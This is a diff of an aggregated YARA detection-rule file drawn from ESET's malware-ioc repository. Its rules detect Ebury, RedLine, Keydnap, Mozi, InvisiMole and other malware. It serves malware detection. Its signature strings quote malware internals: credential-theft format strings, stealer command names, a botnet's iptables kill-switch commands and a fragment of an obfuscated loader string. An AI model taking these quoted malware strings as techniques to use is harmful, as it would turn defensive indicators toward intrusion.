+		reference = "https://github.com/eset/malware-ioc/"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/windigo/ebury.yar#L56-L97"
+		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
+		hash = "e7debd6e453192ad8376db5bab03ed0d87566591"
+		logic_hash = "41908951069a472d7528f2f228f3681f008d16a0436e341d339909efc4933e66"
+		score = 75
+		quality = 80
+		tags = ""
+		license = "BSD 2-Clause"
+		version = 1
+
+	strings:
+		$64 = {
+            48 69 ( 9C 24 ?? ?? ?? ?? | 5C 24 ?? | D2) 6D 4E C6 41 //  imul    rbx, [rsp+_buf], 41C64E6Dh
+            8B (0C 16 | 34 07)                      //  mov     ecx, [rsi+rdx]
+            48 81 C? 39 30 00 00                    //  add     rbx, 12345
+            ( 31 D? |                               //  xor     ecx, ebx
+              31 D? 48 89 9C 24 ?? ?? ?? ?? |       //  mov     [rsp+_buf], rbx
+              31 D? 48 89 5C 24 ?? )                //  ^ optional
+            89 (0C 10 | 34 01)                      //  mov     [rax+rdx], ecx
+            48 83 C? 04                             //  add     rdx, 4
+            48 (81 FA | 3D ) ?? ?? ?? ??            //  cmp     rdx, _size
+            75 D?                                   //  jnz     short _begin
+        }
+		$32 = {
+            69 C9 6D 4E C6 41      // imul    ecx, 41C64E6Dh
+            8B B4 1A ?? ?? ?? ??   // mov     esi, [edx+ebx+_data]
+            81 C1 39 30 00 00      // add     ecx, 12345
+            31 CE                  // xor     esi, ecx
+            89 34 10               // mov     [eax+edx], esi
+            83 C2 04               // add     edx, 4
+            81 FA ?? ?? ?? ??      // cmp     edx, _size
+            75 DD                  // jnz     short loc_69A5
+        }
+
+	condition:
+		any of them
+}
+rule ESET_Onimiki : LINUX_ONIMIKI
+{
+	meta:
+		description = "Linux/Onimiki malicious DNS server"
+		author = "Olivier Bilodeau <bilodeau@eset.com>"
+		id = "3a99799f-fbb4-5fee-a796-3310acd10e17"
+		date = "2014-02-06"
+		modified = "2014-04-04"
+		reference = "https://github.com/eset/malware-ioc/"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/windigo/windigo-onimiki.yar#L32-L59"
+		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
+		logic_hash = "eac30f5c9a9606d1d0e14c55e0532c54976fbb0d2e4f5cd2d9f719b77e07161a"
+		score = 75
+		quality = 80
+		tags = "LINUX/ONIMIKI"
+		malware = "Linux/Onimiki"
+		operation = "Windigo"
+		contact = "windigo@eset.sk"
+		license = "BSD 2-Clause"
+
+	strings:
+		$a1 = {43 0F B6 74 2A 0E 43 0F  B6 0C 2A 8D 7C 3D 00 8D}
+		$a2 = {74 35 00 8D 4C 0D 00 89  F8 41 F7 E3 89 F8 29 D0}
+		$a3 = {D1 E8 01 C2 89 F0 C1 EA  04 44 8D 0C 92 46 8D 0C}
+		$a4 = {8A 41 F7 E3 89 F0 44 29  CF 29 D0 D1 E8 01 C2 89}
+		$a5 = {C8 C1 EA 04 44 8D 04 92  46 8D 04 82 41 F7 E3 89}
+		$a6 = {C8 44 29 C6 29 D0 D1 E8  01 C2 C1 EA 04 8D 04 92}
+		$a7 = {8D 04 82 29 C1 42 0F B6  04 21 42 88 84 14 C0 01}
+		$a8 = {00 00 42 0F B6 04 27 43  88 04 32 42 0F B6 04 26}
+		$a9 = {42 88 84 14 A0 01 00 00  49 83 C2 01 49 83 FA 07}
+
+	condition:
+		all of them
+}
 rule ESET_Helimodproxy
 {
 	meta:
@@ -68698,268 +69348,577 @@ rule ESET_Helimodsteal
 	condition:
 		ESET_Apachemodule_PRIVATE and any of ( $h* ) and any of ( $s* )
 }
-
-rule ESET_Libkeyutils_With_Ctor
+rule ESET_Dino
 {
 	meta:
-		description = "This rule detects if a libkeyutils.so shared library has a potentially malicious function to be called when loaded, either via a glibc constructor (DT_INIT + .ctors) or an initializer function in DT_INIT_ARRAY."
-		author = "ESET, spol. s r.o."
-		id = "7b466bf7-f895-569d-99b0-eca95a6ebc83"
-		date = "2024-02-01"
-		modified = "2024-04-29"
+		description = "No description has been set in the source file - ESET"
+		author = "ESET TI"
+		id = "77d0a039-f60c-59ea-bad6-5b4b630007bb"
+		date = "2015-07-14"
+		modified = "2015-08-17"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/windigo/ebury.yar#L3-L54"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/animalfarm/animalfarm.yar#L73-L96"
 		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		hash = "e7debd6e453192ad8376db5bab03ed0d87566591"
-		logic_hash = "c6172aebc67a05fb044b0450aafcc71c7d1fd2831985587d1a9ad53f59e14214"
+		logic_hash = "898e527eb8b05050135dee7cbe974100710a1a3a6a5cb8eb03563ee1c0aca01f"
 		score = 75
 		quality = 80
 		tags = ""
+		Author = "Joan Calvet"
+		Description = "Dino backdoor"
+		Contact = "github@eset.com"
+		License = "BSD 2-Clause"
+
+	strings:
+		$ = "PsmIsANiceM0du1eWith0SugarInsideA"
+		$ = "destroyPSM"
+		$ = "FM_PENDING_DOWN_%X"
+		$ = "%s was canceled after %d try (reached MaxTry parameter)"
+		$ = "you forgot value name"
+		$ = "wakeup successfully scheduled in %d minutes"
+		$ = "BD started at %s"
+		$ = "decyphering failed on bd"
+
+	condition:
+		any of them
+}
+rule ESET_Cw_Windows_Redline_Panel_Tab_Headers : FILE
+{
+	meta:
+		description = "Matches view headers in Redline Panel"
+		author = "ESET Research"
+		id = "44a95845-b0a3-59c1-8188-86d415eff0bf"
+		date = "2022-10-11"
+		modified = "2024-11-12"
+		reference = "https://github.com/eset/malware-ioc/"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/redline/redline.yar#L32-L55"
+		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
+		hash = "a154dfaedc237c047f419eb6884dab1ef4e2a17d"
+		logic_hash = "3198aa9df2814a5f1d5568c6eed5f3189b2f72b3928cc97645f9bf57eebab9ac"
+		score = 75
+		quality = 80
+		tags = "FILE"
 		license = "BSD 2-Clause"
 		version = 2
 
 	strings:
-		$libname = "libkeyutils.so.1"
+		$ = "RedLine | Log In"
+		$ = "RedLine | Autofilles Viewer"
+		$ = "RedLine | Choose Browser"
+		$ = "RedLine | Cookie Viewer"
+		$ = "RedLine | Credit Card Viewer"
+		$ = "RedLine | Files Viewer"
+		$ = "RedLine | Log saver"
+		$ = "RedLine | System Info Viewer"
 
 	condition:
-		for any ptr_size in ( 4 , 8 ) : ( ( ( ptr_size == 4 and elf.machine == elf.EM_386 ) or ( ptr_size == 8 and elf.machine == elf.EM_X86_64 ) ) and for any d in elf.dynamic : ( d.type == elf.DT_SONAME and ( for any s in elf.sections : ( s.name == ".dynstr" and $libname at ( s.offset + d.val ) ) or for any s in elf.dynamic : ( s.type == elf.DT_STRTAB and $libname at ( s.val + d.val ) ) ) ) and ( for any s in elf.sections : ( s.name == ".ctors" and s.size > 2 * ptr_size ) or for any d in elf.dynamic : ( d.type == elf.DT_INIT_ARRAYSZ and d.val > ptr_size ) ) )
+		uint16( 0 ) == 0x5A4D and 6 of them
 }
-rule ESET_Ebury_V1_7_Crypto
+rule ESET_Cw_Windows_Redline_Panel_Distinctive_Strings : FILE
 {
 	meta:
-		description = "This rule detects the strings decryption routine in Ebury v1.7 and v1.8"
-		author = "ESET, spol. s r.o."
-		id = "93dadf5f-b572-5217-8c82-4957c6d24955"
-		date = "2023-08-01"
-		modified = "2024-04-29"
+		description = "Matches rare strings found in Redline panel"
+		author = "ESET Research"
+		id = "d40ccb6b-e777-5c05-b97c-ead910047649"
+		date = "2022-10-11"
+		modified = "2024-11-12"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/windigo/ebury.yar#L56-L97"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/redline/redline.yar#L57-L77"
 		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		hash = "e7debd6e453192ad8376db5bab03ed0d87566591"
-		logic_hash = "41908951069a472d7528f2f228f3681f008d16a0436e341d339909efc4933e66"
+		hash = "a154dfaedc237c047f419eb6884dab1ef4e2a17d"
+		logic_hash = "7ff0239426c4c3b46a269fad71232295c038c09f276cdc3c7f1142c830260a6d"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		license = "BSD 2-Clause"
-		version = 1
+		version = 2
 
 	strings:
-		$64 = {
-            48 69 ( 9C 24 ?? ?? ?? ?? | 5C 24 ?? | D2) 6D 4E C6 41 //  imul    rbx, [rsp+_buf], 41C64E6Dh
-            8B (0C 16 | 34 07)                      //  mov     ecx, [rsi+rdx]
-            48 81 C? 39 30 00 00                    //  add     rbx, 12345
-            ( 31 D? |                               //  xor     ecx, ebx
-              31 D? 48 89 9C 24 ?? ?? ?? ?? |       //  mov     [rsp+_buf], rbx
-              31 D? 48 89 5C 24 ?? )                //  ^ optional
-            89 (0C 10 | 34 01)                      //  mov     [rax+rdx], ecx
-            48 83 C? 04                             //  add     rdx, 4
-            48 (81 FA | 3D ) ?? ?? ?? ??            //  cmp     rdx, _size
-            75 D?                                   //  jnz     short _begin
-        }
-		$32 = {
-            69 C9 6D 4E C6 41      // imul    ecx, 41C64E6Dh
-            8B B4 1A ?? ?? ?? ??   // mov     esi, [edx+ebx+_data]
-            81 C1 39 30 00 00      // add     ecx, 12345
-            31 CE                  // xor     esi, ecx
-            89 34 10               // mov     [eax+edx], esi
-            83 C2 04               // add     edx, 4
-            81 FA ?? ?? ?? ??      // cmp     edx, _size
-            75 DD                  // jnz     short loc_69A5
-        }
+		$env_var = "%DSK_23%"
+		$fn_name = "IsGratherThan"
+		$telegram0 = "Telegram: @REDLINESUPPORT"
+		$telegram1 = "https://t.me/REDLINESUPPORT"
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5A4D and any of them
 }
-rule ESET_Onimiki : LINUX_ONIMIKI
+rule ESET_Cw_Windows_Redline_Panel_Prompts : FILE
 {
 	meta:
-		description = "Linux/Onimiki malicious DNS server"
-		author = "Olivier Bilodeau <bilodeau@eset.com>"
-		id = "3a99799f-fbb4-5fee-a796-3310acd10e17"
-		date = "2014-02-06"
-		modified = "2014-04-04"
+		description = "Matches prompt messages in Redline panel"
+		author = "ESET Research"
+		id = "3481586b-ed4b-5a27-82a0-0bbb3eea279e"
+		date = "2022-10-11"
+		modified = "2024-11-12"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/windigo/windigo-onimiki.yar#L32-L59"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/redline/redline.yar#L79-L113"
 		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		logic_hash = "eac30f5c9a9606d1d0e14c55e0532c54976fbb0d2e4f5cd2d9f719b77e07161a"
+		hash = "a154dfaedc237c047f419eb6884dab1ef4e2a17d"
+		logic_hash = "0dfab05a9383ba13b3c610f1ab0c81e95804470002f27171ab39706f7723983a"
 		score = 75
 		quality = 80
-		tags = "LINUX/ONIMIKI"
-		malware = "Linux/Onimiki"
-		operation = "Windigo"
-		contact = "windigo@eset.sk"
+		tags = "FILE"
+		license = "BSD 2-Clause"
+		version = 2
+
+	strings:
+		$ = "Choose directory to save log"
+		$ = "Select log to set comment"
+		$ = "Please enter an action to create new task"
+		$ = "Please enter a target to create new task"
+		$ = "Please enter a final point to create new task"
+		$ = "Please enter a correct action to create new task"
+		$ = "Please enter a correct final point to create new task"
+		$ = "Please enter an action to edit task"
+		$ = "Please enter a target to edit task"
+		$ = "Please enter a final point to edit task"
+		$ = "Please enter a correct action to edit task"
+		$ = "Please enter a correct final point to edit task"
+		$ = "Please enter a correct status to edit task"
+		$ = "Please, enter a domains"
+		$ = "Please, enter a valid server ip"
+		$ = "Choose a file to pump"
+		$ = "Enter a valid count of bytes"
+		$ = "Enter a valid count of bytes. Must be more then zero"
+		$ = "Disconnected. Reboot your panel"
+
+	condition:
+		uint16( 0 ) == 0x5A4D and 10 of them
+}
+rule ESET_Cw_Windows_Redline_Panel_Status_Message_Strings : FILE
+{
+	meta:
+		description = "Matches error/success messages in Redline panel"
+		author = "ESET Research"
+		id = "70bdff10-9c86-57e3-b839-e86173a44855"
+		date = "2022-10-11"
+		modified = "2024-11-12"
+		reference = "https://github.com/eset/malware-ioc/"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/redline/redline.yar#L115-L142"
+		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
+		hash = "a154dfaedc237c047f419eb6884dab1ef4e2a17d"
+		logic_hash = "c60fabc81967b083be72ff564af744ab60441de5d563ea6d88d873c0a99bfbdd"
+		score = 75
+		quality = 80
+		tags = "FILE"
 		license = "BSD 2-Clause"
+		version = 1
 
 	strings:
-		$a1 = {43 0F B6 74 2A 0E 43 0F  B6 0C 2A 8D 7C 3D 00 8D}
-		$a2 = {74 35 00 8D 4C 0D 00 89  F8 41 F7 E3 89 F8 29 D0}
-		$a3 = {D1 E8 01 C2 89 F0 C1 EA  04 44 8D 0C 92 46 8D 0C}
-		$a4 = {8A 41 F7 E3 89 F0 44 29  CF 29 D0 D1 E8 01 C2 89}
-		$a5 = {C8 C1 EA 04 44 8D 04 92  46 8D 04 82 41 F7 E3 89}
-		$a6 = {C8 44 29 C6 29 D0 D1 E8  01 C2 C1 EA 04 8D 04 92}
-		$a7 = {8D 04 82 29 C1 42 0F B6  04 21 42 88 84 14 C0 01}
-		$a8 = {00 00 42 0F B6 04 27 43  88 04 32 42 0F B6 04 26}
-		$a9 = {42 88 84 14 A0 01 00 00  49 83 C2 01 49 83 FA 07}
+		$ = "All Browsers are empty"
+		$ = "Client [{0}:{1}:{2}] completed task with {3} ID."
+		$ = "A List of logs cleared"
+		$ = "Browsers not found"
+		$ = "Browsers is empty"
+		$ = "Done. Check your build file"
+		$ = "You must to enable assembly info or certificate in settings"
+		$ = "Duplicate log from "
+		$ = "Password list is empty"
+		$ = "Cookie list is empty"
+		$ = "FTPs not found"
+		$ = "Files not found"
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and 8 of them
 }
-rule ESET_Linux_Rakos
+rule ESET_Cw_Windows_Redline_Panel_Commands : FILE
 {
 	meta:
-		description = "Linux/Rakos.A executable"
-		author = "Peter Kálnai"
-		id = "3c15401a-22c1-59e2-a979-1f9a6a990ae0"
-		date = "2016-12-13"
-		modified = "2016-12-19"
-		reference = "http://www.welivesecurity.com/2016/12/20/new-linuxrakos-threat-devices-servers-ssh-scan/"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/rakos/rakos.yar#L33-L53"
+		description = "Matches commands and functionalities in Redline panel"
+		author = "ESET Research"
+		id = "b479dc47-53a0-5ead-a4c3-bcdfcaf82ef8"
+		date = "2022-10-11"
+		modified = "2024-11-12"
+		reference = "https://github.com/eset/malware-ioc/"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/redline/redline.yar#L144-L172"
 		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		logic_hash = "79a02ada56bf75c5f178b58822eb905977cace3483453ea8cf4dfc32f6b6c30d"
+		hash = "a154dfaedc237c047f419eb6884dab1ef4e2a17d"
+		logic_hash = "724516101264aa89259e847e4703d4eb993f330f82bd2df2433176b11d0c8974"
+		score = 75
+		quality = 55
+		tags = "FILE"
+		license = "BSD 2-Clause"
+		version = 2
+
+	strings:
+		$cmd0 = "Download"
+		$cmd1 = "RunPE"
+		$cmd2 = "DownloadAndEx"
+		$cmd3 = "OpenLink"
+		$cmd4 = "Cmd"
+		$action0 = "GrabBrowsers"
+		$action1 = "GrabFiles"
+		$action2 = "GrabImClients"
+		$action3 = "AntiDuplicate"
+		$action4 = "grabBrowsers"
+		$action5 = "grabFiles"
+		$action6 = "grabImClients"
+		$action7 = "antiDuplicate"
+
+	condition:
+		uint16( 0 ) == 0x5A4D and all of ( $cmd* ) and 4 of ( $action* )
+}
+rule ESET_Keydnap_Downloader
+{
+	meta:
+		description = "OSX/Keydnap Downloader"
+		author = "Marc-Etienne M.Léveillé"
+		id = "2b21007a-b143-5538-8777-ba35448d00aa"
+		date = "2016-07-06"
+		modified = "2016-07-06"
+		reference = "http://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-is-hungry-for-credentials"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/keydnap/keydnap.yar#L33-L49"
+		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
+		logic_hash = "71c8885193a92fa9c71055c37e629a54d50070cf6820b9216a824ecc4db2ce3c"
 		score = 75
 		quality = 80
 		tags = ""
 		version = "1"
-		contact = "threatintel@eset.com"
-		license = "BSD 2-Clause"
 
 	strings:
-		$ = "upgrade/vars.yaml"
-		$ = "MUTTER"
-		$ = "/tmp/.javaxxx"
-		$ = "uckmydi"
+		$ = "icloudsyncd"
+		$ = "killall Terminal"
+		$ = "open %s"
 
 	condition:
-		3 of them
+		2 of them
 }
-rule ESET_Kobalos
+rule ESET_Keydnap_Backdoor_Packer
 {
 	meta:
-		description = "Kobalos malware"
+		description = "OSX/Keydnap packed backdoor"
 		author = "Marc-Etienne M.Léveillé"
-		id = "cdffbe3d-c19d-53a8-9051-48affae00c8a"
-		date = "2020-11-02"
-		modified = "2021-02-01"
-		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/kobalos/kobalos.yar#L32-L56"
+		id = "f29ad5af-bc86-5764-9451-5a8363788c4e"
+		date = "2016-07-06"
+		modified = "2016-07-06"
+		reference = "http://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-is-hungry-for-credentials"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/keydnap/keydnap.yar#L51-L67"
 		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		logic_hash = "9161d22f9fbb1700dc3121e32104240e34512cb280aaf950aec61513f89061ef"
+		logic_hash = "b1740bf38376be81d3b42306c2ce81f578c0b5c9db804f063836bf98f57ed147"
 		score = 75
 		quality = 80
 		tags = ""
-		license = "BSD 2-Clause"
 		version = "1"
 
 	strings:
-		$encrypted_strings_sizes = {
-            05 00 00 00 09 00 00 00  04 00 00 00 06 00 00 00
-            08 00 00 00 08 00 00 00  02 00 00 00 02 00 00 00
-            01 00 00 00 01 00 00 00  05 00 00 00 07 00 00 00
-            05 00 00 00 05 00 00 00  05 00 00 00 0A 00 00 00
-        }
-		$password_md5_digest = { 3ADD48192654BD558A4A4CED9C255C4C }
-		$rsa_512_mod_header = { 10 11 02 00 09 02 00 }
-		$strings_rc4_key = { AE0E05090F3AC2B50B1BC6E91D2FE3CE }
+		$upx_string = "This file is packed with the UPX"
+		$packer_magic = "ASS7"
+		$upx_magic = "UPX!"
 
 	condition:
-		any of them
+		$upx_string and $packer_magic and not $upx_magic
 }
-rule ESET_Kobalos_Ssh_Credential_Stealer
+rule ESET_Keydnap_Backdoor
 {
 	meta:
-		description = "Kobalos SSH credential stealer seen in OpenSSH client"
+		description = "Unpacked OSX/Keydnap backdoor"
 		author = "Marc-Etienne M.Léveillé"
-		id = "b1fc5163-de48-57fc-8ae7-1f2be6c64d8a"
-		date = "2020-11-02"
-		modified = "2021-02-01"
-		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/kobalos/kobalos.yar#L58-L73"
+		id = "099c1796-6237-5ec1-ba25-cd5feca79865"
+		date = "2016-07-06"
+		modified = "2016-07-06"
+		reference = "http://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-is-hungry-for-credentials"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/keydnap/keydnap.yar#L69-L86"
 		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		logic_hash = "be238f5c2cc976a5638584a8c0fc580f2076735aadfe374e8d4162ba723bce10"
+		logic_hash = "fa209577a562ef9088d3ad3df3fbc0edda96f09d19177842f0ddea42c658f530"
 		score = 75
 		quality = 80
 		tags = ""
+		version = "1"
+
+	strings:
+		$ = "api/osx/get_task"
+		$ = "api/osx/cmd_executed"
+		$ = "Loader-"
+		$ = "u2RLhh+!LGd9p8!ZtuKcN"
+		$ = "com.apple.iCloud.sync.daemon"
+
+	condition:
+		2 of them
+}
+rule ESET_Mozi_Killswitch : FILE
+{
+	meta:
+		description = "Mozi botnet kill switch"
+		author = "Ivan Besina"
+		id = "e3d34ae0-de06-5ff4-b44b-44d264b6dd29"
+		date = "2023-09-29"
+		modified = "2023-10-31"
+		reference = "https://github.com/eset/malware-ioc/"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/mozi/mozi.yar#L32-L51"
+		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
+		logic_hash = "90eaed2f7f5595b145b2678a46ef6179082192215369fa9235024b0ce1574a49"
+		score = 75
+		quality = 80
+		tags = "FILE"
 		license = "BSD 2-Clause"
 		version = "1"
 
 	strings:
-		$ = "user: %.128s host: %.128s port %05d user: %.128s password: %.128s"
+		$iptables1 = "iptables -I INPUT  -p tcp --destination-port 7547 -j DROP"
+		$iptables2 = "iptables -I OUTPUT -p tcp --sport 30005 -j DROP"
+		$haha = "/haha"
+		$networks = "/usr/networks"
 
 	condition:
-		any of them
+		all of them and filesize < 500KB
 }
+rule ESET_Apt_Windows_Invisimole_Logs : FILE
+{
+	meta:
+		description = "Detects log files with collected created by InvisiMole's RC2CL backdoor"
+		author = "ESET Research"
+		id = "151883ad-1f44-55b4-b12a-f0d399527189"
+		date = "2021-05-17"
+		modified = "2021-05-17"
+		reference = "https://github.com/eset/malware-ioc/"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/invisimole/invisimole.yar#L54-L77"
+		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
+		logic_hash = "d42423ccc768f1823c76d5cb2aec26434c796fc35bd4e2fbf435fcf7997d3ff0"
+		score = 75
+		quality = 80
+		tags = "FILE"
+		license = "BSD 2-Clause"
+		version = "1"
 
-rule ESET_Gazer_Certificate_Subject
+	condition:
+		uint32( 0 ) == 0x08F1CAA1 or uint32( 0 ) == 0x08F1CAA2 or uint32( 0 ) == 0x08F1CCC0 or uint32( 0 ) == 0x08F2AFC0 or uint32( 0 ) == 0x083AE4DF or uint32( 0 ) == 0x18F2CBB1 or uint32( 0 ) == 0x1900ABBA or uint32( 0 ) == 0x24F2CEA1 or uint32( 0 ) == 0xDA012193 or uint32( 0 ) == 0xDA018993 or uint32( 0 ) == 0xDA018995 or uint32( 0 ) == 0xDD018991
+}
+rule ESET_Apt_Windows_Invisimole_SFX_Dropper : FILE
 {
 	meta:
-		description = "Turla Gazer malware"
+		description = "Detects trojanized InvisiMole files: patched RAR SFX droppers with added InvisiMole blobs (config encrypted XOR 2A at the end of a file)"
 		author = "ESET Research"
-		id = "a7719333-b341-538c-a8ed-5c50b653a765"
-		date = "2017-08-30"
-		modified = "2017-08-29"
+		id = "08490bcd-3139-5fac-9c6c-5a32acb7217a"
+		date = "2021-05-17"
+		modified = "2021-05-17"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/turla/gazer.yar#L33-L46"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/invisimole/invisimole.yar#L79-L95"
 		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		logic_hash = "6e870c9cdcee33769162de62ea143ff401af50b22a63d2f212c44d06f5771dec"
+		logic_hash = "6ca248d42c1e889988e5931d80df071cb20e623fb0c4a208044cabe073f71ce4"
+		score = 75
+		quality = 80
+		tags = "FILE"
+		license = "BSD 2-Clause"
+		version = "1"
+
+	strings:
+		$encrypted_config = {5F 59 4F 58 19 18 04 4E 46 46 2A 5D 59 5A 58 43 44 5E 4C 7D 2A 0F 2A 59 2A 78 2A 4B 2A 58 2A 0E 2A 6F 2A 72 2A 4B 2A 0F 2A 4E 2A 04 2A 0F 2A 4E 2A 76 2A 0F 2A 79 2A 2A 2A 79 42 4F 46 46 6F 52 4F 49 5F 5E 4F 7D 2A 79 42 4F 46 46 19 18 04 4E 46 46 2A 7C 43 58 5E 5F 4B 46 6B 46 46 45 49 2A 66 45 4B 4E 66 43 48 58 4B 58 53 6B}
+
+	condition:
+		uint16( 0 ) == 0x5A4D and $encrypted_config
+}
+rule ESET_Apt_Windows_Invisimole_CPL_Loader : FILE
+{
+	meta:
+		description = "CPL loader"
+		author = "ESET Research"
+		id = "feff8627-6085-5835-ac1b-d4522245f7db"
+		date = "2021-05-17"
+		modified = "2021-05-17"
+		reference = "https://github.com/eset/malware-ioc/"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/invisimole/invisimole.yar#L97-L118"
+		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
+		logic_hash = "cd5c19e14faa7fd3758b30193ccf2bed3692ad29d8216466523ca25d2abcfe88"
+		score = 75
+		quality = 80
+		tags = "FILE"
+		license = "BSD 2-Clause"
+		version = "1"
+
+	strings:
+		$s1 = "WScr%steObject(\"WScr%s.Run(\"::{20d04fe0-3a%s30309d}\\\\::{21EC%sDD-08002B3030%s\", 0);"
+		$s2 = "\\Control.js" wide
+		$s3 = "\\Control Panel.lnk" wide
+		$s4 = "FPC 3.0.4 [2019/04/13] for x86_64 - Win64"
+		$s5 = "FPC 3.0.4 [2019/04/13] for i386 - Win32"
+		$s6 = "imageapplet.dat" wide
+		$s7 = "wkssvmtx"
+
+	condition:
+		uint16( 0 ) == 0x5A4D and ( 3 of them )
+}
+
+rule ESET_Apt_Windows_Invisimole_Wrapper_DLL
+{
+	meta:
+		description = "Detects InvisiMole wrapper DLL with embedded RC2CL and RC2FM backdoors, by export and resource names"
+		author = "ESET Research"
+		id = "b9609b09-3ef5-5793-a3aa-4692cec367d9"
+		date = "2021-05-17"
+		modified = "2021-05-17"
+		reference = "https://github.com/eset/malware-ioc/"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/invisimole/invisimole.yar#L120-L138"
+		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
+		logic_hash = "156bc5bc7b0ed5c77a5a15e7799a3077d40150896476a60935cf21a9afe36856"
 		score = 75
 		quality = 80
 		tags = ""
-		contact = "github@eset.com"
 		license = "BSD 2-Clause"
+		version = "1"
+
+	condition:
+		pe.exports( "GetDataLength" ) and for any y in ( 0 .. pe.number_of_resources - 1 ) : ( pe.resources [ y ] . type == pe.RESOURCE_TYPE_RCDATA and pe.resources [ y ] . name_string == "R\x00C\x002\x00C\x00L\x00" ) and for any y in ( 0 .. pe.number_of_resources - 1 ) : ( pe.resources [ y ] . type == pe.RESOURCE_TYPE_RCDATA and pe.resources [ y ] . name_string == "R\x00C\x002\x00F\x00M\x00" )
+}
+rule ESET_Apt_Windows_Invisimole_DNS_Downloader : FILE
+{
+	meta:
+		description = "InvisiMole DNS downloader"
+		author = "ESET Research"
+		id = "1caa6c8b-3798-556e-835e-885b7f3f4511"
+		date = "2021-05-17"
+		modified = "2021-05-17"
+		reference = "https://github.com/eset/malware-ioc/"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/invisimole/invisimole.yar#L140-L170"
+		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
+		logic_hash = "88d6ed7ec1331153d19afc18473a4be2b214ad8af29fcf7051a2a8e40e088231"
+		score = 75
+		quality = 80
+		tags = "FILE"
+		license = "BSD 2-Clause"
+		version = "1"
+
+	strings:
